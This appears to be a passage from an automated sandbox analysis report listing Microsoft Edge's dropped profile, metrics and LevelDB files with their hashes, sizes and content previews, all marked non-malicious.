                                                                                                                                                                                                                                                                                              SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67587D02-1C28.pma

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 134217728.000000, slope 75015551881388056232440365056.000000
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.44366059988538836
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:gi6S/uOyMPSp0VXxm0/Ug1HFq2G9o1ytuaU02QbcDca+oKJzMg1HF:+S/LPO01o0/UaHlGayoPQbQcjo0MaH
                                                                                                                                                                                                                                                                                              MD5:4336203DC9FB11F74332BAC4996B9B35
                                                                                                                                                                                                                                                                                              SHA1:796B72098544E42CCCA906E98E87158C1005A30A
                                                                                                                                                                                                                                                                                              SHA-256:54E1034F7169A232106B50425467F34731F4995A4E0FCB9287F1E1938BEFD33F
                                                                                                                                                                                                                                                                                              SHA-512:A94BCD21D6A46355D697DBECA9E6FDF4BC8523D4EA70418F878D5EDD8D24EF305D796C4C9380A1489B6A301EF89F5B878D72FED4EDD4F6D267618978C9763678
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...@..@...@.....C.].....@...............0...................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".aoctdc20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K.u.$r.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ .`2..........~

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67587D10-2350.pma

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.044517546143449195
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:viWi0o3tmTUIaddxJg+0UggrXp1IOPkt1kKh1PNEQpV1gQscoDwMegn8y08Tcm2D:v7i0stsUDdn4hJNfgQoD1/08T2RGOD
                                                                                                                                                                                                                                                                                              MD5:0F4039019DA3AE2353924CAE447D67C2
                                                                                                                                                                                                                                                                                              SHA1:C33F22CCB29AF8E7F9E503AB0A368893C7A621C2
                                                                                                                                                                                                                                                                                              SHA-256:614E4B17F5E19A84E5F79A26D7945F353A9D734016223C7774921F65C60BAB1E
                                                                                                                                                                                                                                                                                              SHA-512:321B3D7D794C3C12449F6DFBCE0E7A138E5F8752ADDFA08FB296E72084F3234A23BB9EC947DDBCFE176AAECBEC953C42595016A690AB27315AD5834D92FAD6CA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...@..@...@.....C.].....@................e...T..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".aoctdc20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..Uu.$r.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. ...2........6...

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):280
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.124898764628895
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5etll:o1ApdeaEqYsMazlYBVsJDu2ziy5eX
                                                                                                                                                                                                                                                                                              MD5:58C4D8DE72E3ECED51A6FA470EDB0B3F
                                                                                                                                                                                                                                                                                              SHA1:EFBC52CA094310145103EB9A42AEDB37433E8C2D
                                                                                                                                                                                                                                                                                              SHA-256:A0EA6C0BD7828E1691C2FB39D7B7CD642628E253684A809F814D9E25D8BE3F9F
                                                                                                                                                                                                                                                                                              SHA-512:E92DEC4B52EA5786AADE4B675BAE5C8DDA0139064F82C71D37F5782D54894AA1BCAECBE9E4892D73D686724508857347BECD30D658267346B3DEBF1136C29A90
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\161562e4-6e41-46dd-9c2b-8c05d0831db3.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40504
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.5609767962997045
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:AFOJJU7pLGLPQuWPZhfEs8F1+UoAYDCx9Tuqh0VfUC9xbog/OVb1lOCGcrwIVl7A:AFOJJYcPQuWPZhfEsu1jaC1lTGVIVleN
                                                                                                                                                                                                                                                                                              MD5:D972DDDC994E619FFD5508ABF5A9D61D
                                                                                                                                                                                                                                                                                              SHA1:8FB7DBEAD3C5B5DB67ABF68F9391942D9F9A46AA
                                                                                                                                                                                                                                                                                              SHA-256:2058C96EF27CF899ED8B042E547FAAF7DE64F3D3C49CC5457AE9BD18809603BF
                                                                                                                                                                                                                                                                                              SHA-512:7500DDC2192234296A30C2ACC12254405F9ECC6B02D8C38A695E096ED95D2569DC1D24A5E5FCF96641F2C618359A8CDE11A0C85B90EB7B43E01C16D3F224B29B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326019029821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326019029821","location":5,"ma

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\18c48944-4132-4cda-b4ae-be06a57649d6.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):13333
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.266031253224988
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:stMPGo4Su4sfgfhOkdbGix6W0OBylaTYG:sOOoPuzgfpdbGix4aTYG
                                                                                                                                                                                                                                                                                              MD5:583EB669BEB122673176EBAE774F4E00
                                                                                                                                                                                                                                                                                              SHA1:31332DD5C056140F60F2CE389CD64077D4D8E660
                                                                                                                                                                                                                                                                                              SHA-256:7E9145E7BC1593B86F9DBE393BF3E2CF1F801B463500E287E8F3ECAA83F6A6BF
                                                                                                                                                                                                                                                                                              SHA-512:BF085D014838C02A97CE5A47544C0CDFB50F42E54898E8D142C1101347811938656A24E08BD5D67B94CD0D07D49C5CC8BDB9D798A4E8A78E120EE2E65231E44C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326020367279","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6d0a99a2-eb5c-43d7-9868-a94563961133.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9261
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.098540041339969
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:stkSWsfgsZihnkAaU3T88bV+FiA66WtaFIMYIP+YJ:stk5sfgfhxPbGix6WtaTYG
                                                                                                                                                                                                                                                                                              MD5:104022127F755F994BA7CAB36AFF0680
                                                                                                                                                                                                                                                                                              SHA1:A987BA328707BB66AD30BD4D708CA251F13B5327
                                                                                                                                                                                                                                                                                              SHA-256:F70FAC7EEFFBA4CABB35E1AF343369A3E6C92CCA5893D67A1BD14C859E245694
                                                                                                                                                                                                                                                                                              SHA-512:1C43FDB15052E8C03DEEC494F957CB5339144070767926EEDBB38456F5A77164609901458B7D96810A6809984EA6037320303FA1F8C7A4AE81AE2BD1643D388A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326020367279","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326019801415","domain_dive

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\74d971f7-9866-435a-9dbb-678d8145d8ba.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):115717
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                              MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                              SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                              SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                              SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\78f2e58d-4bb6-4b79-ab92-eea189c679ae.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25012
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.5671885608363025
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:AY0J0uWPZhfhs8F1+UoAYDCx9Tuqh0VfUC9xbog/OVbOCZcrwGpGtu/:AY0J0uWPZhfhsu1ja6TZVzt8
                                                                                                                                                                                                                                                                                              MD5:A37A898DCDCE7E529487FA0F803F884C
                                                                                                                                                                                                                                                                                              SHA1:53C2A0240040C351E220CABCE8903FCD02B9100C
                                                                                                                                                                                                                                                                                              SHA-256:6245ADF58AD55F8704391A9D6031629CFDD704B91B814A197F066D012F0EC426
                                                                                                                                                                                                                                                                                              SHA-512:D838D97270DD90F2409F4499525121D6BCCA679295E2B9F729DF91752046F78754D89261D0889E56B0C5B4D54792D195AA3F8062CCF3EFB73F333F8D40A0AEB0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326019029821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326019029821","location":5,"ma

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8182d506-58b5-4b0a-a02c-e898e4d998d4.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):13168
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.268189313702032
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:stMJ99QTryDiooybatSuyxsfgsZihOQkAaU3T82bV+FiA66WPOB0aFIMYIP+YJ:stMPGo4Su4sfgfhOkdbGix6WPOB0aTYG
                                                                                                                                                                                                                                                                                              MD5:6EEDF02951FF8B34ED8528969BEB4545
                                                                                                                                                                                                                                                                                              SHA1:DB828E2310DF50750CBBE66DD3BA47D07423B372
                                                                                                                                                                                                                                                                                              SHA-256:170BD00B4FEAC52CCAF399A551FDD9B58572ED9C49F55A2A01E0B836A27C3F00
                                                                                                                                                                                                                                                                                              SHA-512:61498A60E8DFDA1798DF6752978612B22E5C9CBF71A296C7D03A084FC28DE8D4BB97FC864A36D0FDE65FB3AFD7B39571B09BF8FA65940691C7406792E60DC4D4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326020367279","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):33
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                              MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                              SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                              SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                              SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):309
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.211190129933816
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7LYLC1923oH+Tcwtp3hBtB2KLlpLYL+39+q2P923oH+Tcwtp3hBWsIFUv:7KnYebp3dFLTKI9+v4Yebp3eFUv
                                                                                                                                                                                                                                                                                              MD5:3488E1BCFBEF3304A0FC94F8E1864C05
                                                                                                                                                                                                                                                                                              SHA1:517C828D8F8FF52152DD92734F9277F7A60E8C3F
                                                                                                                                                                                                                                                                                              SHA-256:74E48A66E48644A75A4E92B5A44A61791A2E736A7BEFE1624B040E809E53D5A7
                                                                                                                                                                                                                                                                                              SHA-512:17356CDB96F9A9C1ADCADA70AD61BEA19BA69E810C914FC86364C983EFA0CDCF4B9CE663E5E4C1C9570B2DD5ACCFECD1B76147551CC0EE1ECC6D678AE9D27246
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:25.186 1d0c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/10-12:40:25.388 1d0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):2163821
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.222851513879229
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:v+/PN8FnfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8Bfx2mjF
                                                                                                                                                                                                                                                                                              MD5:38EE1C1E0814DB4F09B31D5FEE0755C5
                                                                                                                                                                                                                                                                                              SHA1:4EA1BB79E079893CCD91913FCF355456607E9D9A
                                                                                                                                                                                                                                                                                              SHA-256:9ABB5FEA5F879BAB44E0269F933714FD696062EE00914B5374048ACA51E7189E
                                                                                                                                                                                                                                                                                              SHA-512:C53A640C58F6149B6BB8548D46C4950125C004DE21C8750993D2A3D54F7873172DB6A71CFA91F2DFE0BC1C5625438E515118A3AD11286980362BB733392080B7
                                                                                                                                                                                                                                                                                              Malicious:false
